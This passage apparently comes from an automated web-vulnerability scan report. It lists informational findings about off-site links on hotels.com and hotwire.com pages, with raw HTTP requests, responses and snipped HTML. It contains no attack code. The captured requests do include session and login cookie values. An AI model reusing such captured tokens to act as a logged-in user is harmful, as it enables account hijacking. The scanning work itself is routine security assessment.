Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMTo5Ny43My4xLmkzOjk4LjYuNDoxMzcuMC4wLmkyOjE0NS4wLjAuaTI6MTA4LjEuMC5pMjoxNTIuMC4wLmkyOjIuMi4xOjE5Ni4xLjA6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEzOC4xLjA6MTk1LjAuMDoxMDQuMC4xfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Content-Length: 368925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<li><a href="http://www.hoteles.com" title="Espa..ol" lang="es" hreflang="es">Espa..ol</a>
...[SNIP]...
<li><a href="http://www.hoteis.com" title="Portugu..s" lang="pt" hreflang="pt">Portugu..s</a>
...[SNIP]...
<td width="135" align="right" valign="top">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.hotels.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<br />
<a href="http://www.verisign.com/ssl-certificate/" target="_blank" style="color:#000000; text-decoration:none; font:bold 7px verdana,sans-serif; letter-spacing:.5px; text-align:center; margin:0px; padding:0px;">ABOUT SSL CERTIFICATES</a>
...[SNIP]...
<li>
<a href="https://joinexpedia.com/default.asp?lang=uk" rel="nofollow">
Add Hotel</a>
...[SNIP]...
<li>
<a href="http://www.expediaaffiliate.com/" rel="nofollow">
Private Label</a>
...[SNIP]...
<li>
<a href="http://www.advertising.expedia.com" rel="nofollow">
Promote with Us</a>
...[SNIP]...
<li>
<a href="http://www.agentrez.com/" rel="nofollow">
Travel Agents</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js" async="true"></script>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=109368;u13=324884;u14=255157;u15=1643195;u16=04%2F10%2F11-07%2F10%2F11;u18=2;ord=73008363?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
19.202. http://www.hotels.com/search/search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search/search.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; SSLB=1; SSPV=PfwAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A130.1.1.i2%3A103.4.1.i6%3A171.1.0%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//"; user=RCoxODUuMC4wLmkxOjExNC4xLjA6MTI0LjEuMC5pMToxMzAuMS4xLmkyOjEwMy40LjEuaTY6MTcxLjEuMDo0OC4xLjA6OTcuNzMuMS5pMzo5OC42LjQ6MTQyLjAuMC5pNDoxOTguMi4wOjE0NS4wLjAuaTI6MjAwLjAuMDoxMzcuMC4wLmkyOjEwOC4xLjAuaTI6MTkwLjMuMDoxNTIuMC4wLmkyOjEzNC4wLjE6MTk2LjEuMDoyLjIuMToyMDkuMC4xOjE0Ny42LjAuaTY6OTIuMC4wLmkxOjEyMS41MDMuMC5pNzoxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTM4LjEuMDoxNDkuMC4wLmkxOjEwNC4wLjE6MTk1LjAuMHxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDIhRio.

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=DvwAAAAAAAEAAAAAAAAAAAAAAAMAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:34 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A84.0.0.i2%3A98.6.4%3A142.0.0.i4%3A119.0.2.i2%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A78.0.1%3A147.0.1.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A184.0.0.i1%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6ODQuMC4wLmkyOjk4LjYuNDoxNDIuMC4wLmk0OjExOS4wLjIuaTI6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMTo3OC4wLjE6MTQ3LjAuMS5pNjo5Mi4wLjAuaTE6MTIxLjUwMy4wLmk3OjEzMi4yLjAuaTI6MTg0LjAuMC5pMToxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Content-Length: 371034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<li><a href="http://www.hoteles.com" title="Espa..ol" lang="es" hreflang="es">Espa..ol</a>
...[SNIP]...
<li><a href="http://www.hoteis.com" title="Portugu..s" lang="pt" hreflang="pt">Portugu..s</a>
...[SNIP]...
<td width="135" align="right" valign="top">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.hotels.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<br />
<a href="http://www.verisign.com/ssl-certificate/" target="_blank" style="color:#000000; text-decoration:none; font:bold 7px verdana,sans-serif; letter-spacing:.5px; text-align:center; margin:0px; padding:0px;">ABOUT SSL CERTIFICATES</a>
...[SNIP]...
<li>
<a href="https://joinexpedia.com/default.asp?lang=uk" rel="nofollow">
Add Hotel</a>
...[SNIP]...
<li>
<a href="http://www.expediaaffiliate.com/" rel="nofollow">
Private Label</a>
...[SNIP]...
<li>
<a href="http://www.advertising.expedia.com" rel="nofollow">
Promote with Us</a>
...[SNIP]...
<li>
<a href="http://www.agentrez.com/" rel="nofollow">
Travel Agents</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js" async="true"></script>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=105311;u13=114243;u14=203448;u15=1401516;u16=14%2F10%2F11-16%2F10%2F11;u18=2;ord=3653678?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
19.203. http://www.hotwire.com/hotel/details.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /hotel/details.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665 HTTP/1.1
Host: www.hotwire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=974DB21E0DA548F45875D88836CCB561; SaneID=974DB21E0DA548F45875D88836CCB56; NSC_qspe-xxx-qfstjtu=ffffffffaf131c8e45525d5f4f58455e445a4a422d6f; hwAnalytics_previousPageName=hotel.results; gsc=1; hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//l477VJL34Ji0R3huVJCIXPoj2E2Dil0d+iPYTYOKXR0HbQ0daheJbt99vtzXseEa+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4BraAnioKq60T2Ii7hTLeddfkVbI7P1I/pc=; hotwirePageModuleState=pgoodCode=H&searchTokenId=1; s_cpm=%5B%5B'sid%253AS250%252Cbid%253AB260711'%2C'1317602289069'%5D%5D; s_vi=[CS]v1|274481F985012F24-6000010920164B07[CE]; quoter_buyer=HQ; s_cc=true; s_sq=%5B%5BB%5D%5D; hwAnalytics_lid=hotel.results.opaque%3Abooking-nav%3Acontinue; hwAnalytics_crossPageVariables=%7B%22prop61%22%3A%22social-proof-m%22%2C%22eVar41%22%3A%222%22%2C%22eVar34%22%3A%22FLU01-01%22%7D; s_nr=1317603699724

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 01:01:43 GMT
Content-Length: 131060


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="Content-Language" content="en-us"/>
<meta http-equ
...[SNIP]...
ngsv02.html" l gen true for "http://www.hotwire.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.hotwire.com" r (n 0 s 0 v 0 l 0))' />


<link rel="shortcut icon" href="http://ak-static.hotwirestatic.com/static/images/favicon2.ico?ver=207657"/>
<link rel="stylesheet" type="text/css" href="http://ak-static.hotwirestatic.com/static/deploy/master/hwCore.css?ver=216778"/>


<script>
...[SNIP]...
</script>


<script src="http://ak-static.hotwirestatic.com/static/deploy/master/hwCore.js?ver=219395"></script>


<link rel="stylesheet" href="http://ak-static.hotwirestatic.com/static/deploy/??css/hotelDetails-sprite.css,css/purchasePath-sprite.css,css/details.css,css/hotels-sprite.css,css/tripWatcherLayout.css,css/promoUnit.css,ver=222153" type="text/css"/>

<link rel="stylesheet" href="http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css?ver=209738" media="print" type="text/css"/>


<script>
...[SNIP]...
</script>


<a href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Hotels&sid=S287&bid=B312633" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.header',
link:'dest4'});"
target="_new">
<span class="dealPrice">
...[SNIP]...
</a>
<a class="rightText" href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Hotels&sid=S287&bid=B312633" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.header',
link:'dest4'});"
target="_new">
<img src="http://ak-static.hotwirestatic.com/static/images/travel-ticker/tt-hw-logo2.png?ver=169988"
class="ttHwLogo"
width="153"
height="18"
alt="Get great deals at www.travel-ticker.com"/>
<span class="staticMessage">
...[SNIP]...
<a href="http://www.hotwire.com/index.jsp" onclick="AnalyticsSupport.storeLinkId({moduleName:'NAV-LOGO',linkName:'HOTWIRE'});"><img src="http://ak-static.hotwirestatic.com/static/images/shell/hotwire-logo-3d.gif?ver=222960" width="165" height="33" border="0" alt="Hotwire.com Home"/></a>
...[SNIP]...
href="#" title="Help"
onclick="CompSupport.callJsObj('currencyHelpLayer', 'show', this); AnalyticsSupport.logOmnitureLinkEvent({moduleName:'curr-help', link: 'help1'}); return false;">
<img class='iconNormal' src='http://ak-static.hotwirestatic.com/static/images/global/icon-whats-this.gif?ver=193627' alt="Help"/>
</a>
...[SNIP]...
<h1>

<img src="http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif?ver=222796"
border="0" width="183" height="23" alt="About your hotel."/>

</h1>
...[SNIP]...
<div class="body">


<img src="http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png?ver=177999" alt="We'll email you when this price drops" width="178" height="61"/>
<p>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png?ver=222337" alt="Watch this trip"/></button>
...[SNIP]...
<div class="center">
<img class="waiting" src="http://ak-static.hotwirestatic.com/static/images/core/searching/popup/loading-animation.gif?ver=158026"
width="66" height="65" border="0" alt="...waiting..." /><br/>
<img class="message" src="http://ak-static.hotwirestatic.com/static/images/core/searching/popup/updating_animation_narrow.gif?ver=158026"
width="91" height="16" border="0" alt="Updating..." />
</div>
...[SNIP]...
<span class="imgAlign"><img src="http://ak-static.hotwirestatic.com/static/images/hotel/results/imgSocialProof.png?ver=222796"/> </span>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif?ver=222337" alt="Book now"/></button>
...[SNIP]...
<li><img src="http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif?ver=211768">
&nbsp;Holiday Inn
</li>
...[SNIP]...
<li><img src="http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif?ver=211768">
&nbsp;DoubleTree
</li>
...[SNIP]...
<li><img src="http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif?ver=211768">
&nbsp;Hilton Garden Inn
</li>
...[SNIP]...
<li><img src="http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif?ver=211768">
&nbsp;and other respected hotel brands
</li>
...[SNIP]...
<h3 class="header">
<img src="http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg?ver=222796" alt=""
width="61" height="42">
<span>
...[SNIP]...
r-cross-sell', linkName:'see-more-car-types'});
CompSupport.callJsObj(this, 'refresh', ['54']);
return false;
">
<img src="http://ak-static.hotwirestatic.com/static/images/buttons/forward-arrow-red.gif?ver=222337"
alt="" width="23" height="23">
<span>
...[SNIP]...
<div class="logo fRt fnt15">

<a href="http://www.tripadvisor.com" target="_blank"><img
src="http://www.tripadvisor.com/img/cdsi/partner/tripAdvisorLogo-11007-0.gif"
width="107" height="19" alt="TripAdvisor logo" border="0"/></a>
...[SNIP]...
<div class="panControls" id="_pan">
<img src="http://ak-static.hotwirestatic.com/static/images/core/map/pan_arrow.png?ver=209098" width="39" height="39" border="0"
usemap="#_areaMap" alt="">
<map name="_areaMap" id="_areaMap">
...[SNIP]...
<div class="rating">

<img src='http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif?ver=185464' />

</div>
...[SNIP]...
<div class="rating">

<img src='http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif?ver=146387' />

</div>
...[SNIP]...
<div class="rating">

<img src='http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif?ver=146387' />

</div>
...[SNIP]...
<div class="rating">

<img src='http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif?ver=146387' />

</div>
...[SNIP]...
<div class="rating">

<img src='http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif?ver=146387' />

</div>
...[SNIP]...
<div class="rating">

<img src='http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif?ver=146387' />

</div>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif?ver=222337" alt="Book now"/></button>
...[SNIP]...
<a href="#" onclick="return CompSupport.getJsObj(this).openFeedbackForm(this);">
<img src="http://ak-static.hotwirestatic.com/static/images/core/opinionlab/balloon-icon.gif?ver=156461" alt=""/>
<strong>
...[SNIP]...
</strong>
<img src="http://ak-static.hotwirestatic.com/static/images/core/opinionlab/pop-up-icon.gif?ver=156461" alt="" class="pop-up-icon">
</a>
...[SNIP]...
</script>


<a href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Packages&sid=S287&bid=B312628" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.footer',
link:'dest3'});"
target="_new">
<span class="dealPrice">
...[SNIP]...
</a>
<a class="rightText" href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Packages&sid=S287&bid=B312628" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.footer',
link:'dest3'});"
target="_new">
<img src="http://ak-static.hotwirestatic.com/static/images/travel-ticker/tt-hw-logo2.png?ver=169988"
class="ttHwLogo"
width="153"
height="18"
alt="Get great deals at www.travel-ticker.com"/>
<span class="staticMessage">
...[SNIP]...
<li><a href="http://www.advertising.expedia.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-FOOTER:loc:0:ADVERTISERS',
'external-link','http://www.advertising.expedia.com', AnalyticsSupport.pageId)">Advertisers</a>
...[SNIP]...
</a> -
<a target="_blank" href="http://www.carrentals.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:CARRENTALS',
'external-link','http://www.carrentals.com', AnalyticsSupport.pageId);">CarRentals.com</a> -
<a target="_blank" href="http://www.travel-ticker.com/"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:TRAVEL-TICKER',
'external-link','http://www.travel-ticker.com', AnalyticsSupport.pageId);">Travel-Ticker.com</a>
...[SNIP]...
</strong>
<a target="_blank" href="http://www.expedia.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:EXPEDIA',
'external-link','http://www.expedia.com', AnalyticsSupport.pageId);">Expedia</a> -
<a target="_blank" href="http://www.hotels.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:HOTELS',
'external-link','http://www.hotels.com', AnalyticsSupport.pageId);">Hotels.com</a> -
<a target="_blank" href="http://www.classicvacations.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:CLASSIC',
'external-link','http://www.classicvacations.com', AnalyticsSupport.pageId);">ClassicVacations.com</a> -
<a target="_blank" href="http://www.tripadvisor.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:TRIPADVISOR',
'external-link','http://www.tripadvisor.com', AnalyticsSupport.pageId);">TripAdvisor.com</a> -
<a target="_blank" href="http://www.smartertravel.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:SMARTER-TVL',
'external-link','http://www.smartertravel.com', AnalyticsSupport.pageId);">Smarter Travel</a> -
<a target="_blank" href="http://www.egencia.com/" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:EGENCIA',
'external-link','http://www.egencia.com/', AnalyticsSupport.pageId);">Egencia</a>
...[SNIP]...
<strong><a target="_blank" href="http://iac.com/index.html"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:IAC',
'external-link','http://iac.com/index.html', AnalyticsSupport.pageId);">IAC/InterActiveCorp</a>
...[SNIP]...
</strong>
<a target="_blank" href="http://www.bloglines.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:BLOGLINES',
'external-link','http://www.bloglines.com', AnalyticsSupport.pageId);">Bloglines</a> -
<a target="_blank" href="http://www.citysearch.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:CITY-SEARCH',
'external-link','http://www.citysearch.com', AnalyticsSupport.pageId);">Citysearch</a> -
<a target="_blank" href="http://www.evite.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:EVITE',
'external-link','http://www.evite.com', AnalyticsSupport.pageId);">Evite</a> -
<a target="_blank" href="http://www.gifts.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:GIFTS',
'external-link','http://www.gifts.com', AnalyticsSupport.pageId);">Gifts</a> -
<a target="_blank" href="http://www.lendingtree.com/"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:LENDING-TREE',
'external-link','http://www.lendingtree.com/', AnalyticsSupport.pageId);">LendingTree</a> -
<a target="_blank" href="http://www.match.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:MATCH','external-link',
'http://www.match.com', AnalyticsSupport.pageId);">Match</a> -
<a target="_blank" href="http://www.hsn.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:ONLINE-SHOPPING',
'external-link','http://www.hsn.com', AnalyticsSupport.pageId);">Online Shopping</a> -
<a target="_blank" href="http://www.pronto.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:PRONTO',
'external-link','http://www.pronto.com', AnalyticsSupport.pageId);">Pronto</a> -
<a target="_blank" href="http://www.servicemagic.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:SERVICEMAGIC',
'external-link','http://www.servicemagic.com', AnalyticsSupport.pageId);">ServiceMagic</a> -
<a target="_blank" href="http://www.shoebuy.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:SHOES','external-link',
'http://www.shoebuy.com', AnalyticsSupport.pageId);">Shoebuy</a> -
<a target="_blank" href="http://www.thedailybeast.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:THE-DAILY-BEAST',
'external-link','http://www.thedailybeast.com', AnalyticsSupport.pageId);">The Daily Beast</a>
...[SNIP]...
<div class="yui3-u rightInfo">
<img class="mr10" src="http://ak-static.hotwirestatic.com/static/images/shell/BBB_logo_A.jpg?ver=222960" width="135" height="53" border="0" alt="BBB Acredited Business"/>
<a target="_blank" href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--27352.html"><img class="bizrate"
src="http://ak-static.hotwirestatic.com/static/images/shell/bizrate_27352_medal_sm.gif?ver=222960" width="112" height="37" border="0" alt="Bizrate Registered Store"/></a>
...[SNIP]...
, strikes, natural disasters and bad weather. Trip Protection does not offer coverage for change of plans due to non-emergency situations. You can purchase Trip Protection up until your check-in date. <a href="http://www.etravelprotection.com/servlet/WASCPure?accam=F028548" onclick="AppSupport.popUpWindow(this,'accessAmerica','height=650,width=700,left=0,top=0,toolbar=yes,status=yes,scrollbars=yes,location=yes,menubar=yes,directories=yes,resizable=yes');return false;" class="popUp"><strong>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-update-results.png?ver=222337" alt="Submit"/></button>
...[SNIP]...
19.204. http://www.hotwire.com/hotel/results.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /hotel/results.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hotel/results.jsp?searchTokenId=1 HTTP/1.1
Host: www.hotwire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
